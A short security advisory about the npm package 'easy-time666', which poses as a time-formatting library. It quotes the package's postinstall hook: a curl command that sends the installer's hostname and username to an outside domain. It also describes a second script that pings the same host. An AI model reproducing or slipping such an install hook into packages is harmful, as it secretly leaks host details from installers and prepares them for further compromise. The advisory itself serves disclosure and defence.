Malicious code in easy-time666 (npm)

---

__

Source: amazon-inspector (57bc31746af3bff6006bfe2da34cd0fb223a4bd9e867abddd172be5018821c22)

package.json declares a postinstall hook that runs curl http://npm.wdf1.eyes.sh/pre?h=$(hostname)&u=&(whoami) over plain HTTP on every npm install, leaking the installer's hostname and current username to a non-publisher domain. The package advertises itself as a time-formatting library and has no legitimate reason to phone home with host identifiers. A second file, scripts/postinstall.js, is shipped in the tarball and POSTs JSON {ping:'npm'} to the same host (npm.wdf1.eyes.sh) over plain HTTP, reinforcing the install-time callback. This is the canonical recon-beacon pattern used to enumerate compromised hosts before staging follow-on payloads.

Source: ossf-package-analysis (6d4d0f8dc97023a33bc4928ce119e7001f5233f8b7fda31afffeb9dbb3ba9cdf)

The OpenSSF Package Analysis project identified 'easy-time666' @ 1.0.0 (npm) as malicious.

It is considered malicious because:

• The package executes one or more commands associated with malicious behavior.